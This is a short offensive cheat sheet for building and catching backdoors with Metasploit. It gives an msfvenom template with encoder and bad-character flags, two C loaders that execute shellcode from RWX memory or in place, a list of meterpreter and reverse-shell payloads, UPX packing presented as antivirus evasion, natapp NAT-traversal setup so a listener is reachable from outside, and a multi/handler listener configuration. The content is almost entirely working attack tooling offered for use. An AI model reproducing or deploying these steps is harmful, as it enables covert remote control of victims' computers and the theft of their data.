Backdoor generation
msfvenom -p <payload> LHOST=<ip> LPORT=<port> -e <encoder> -i <count> -b <bad chars> -f <format> -o <file>
-p <payload type>
-e x86/shikata_ga_nai (encoder)
-b '\x00' (bad characters to avoid)
-i <encode times>
-o <file name>
-f c (output format, here a C array)
Loader variant 1 (copies the array into an executable allocation; buf must be declared before main uses it):
#include <windows.h>
#include <string.h>

unsigned char buf[] =
"shellcode is here";

int main()
{
    void *Memory = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    memcpy(Memory, buf, sizeof(buf));
    ((void(*)())Memory)();
    return 0;
}

Loader variant 2 (calls the array in place):
unsigned char buf[] =
"shellcode is here";

int main()
{
    ((void(*)(void))&buf)();
    return 0;
}
Common payloads
windows/meterpreter/reverse_tcp
linux/x86/shell_reverse_tcp
java/meterpreter/reverse_tcp
php/meterpreter/reverse_tcp
Packing for AV evasion
upx
NAT traversal
Register a natapp account and configure the port
chmod +x natapp
mv natapp /usr/local/natapp/natapp
cd /usr/local/natapp/
nohup ./natapp -authtoken=xxxx -log=stdout &
ps -ef|grep natapp
Test
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 666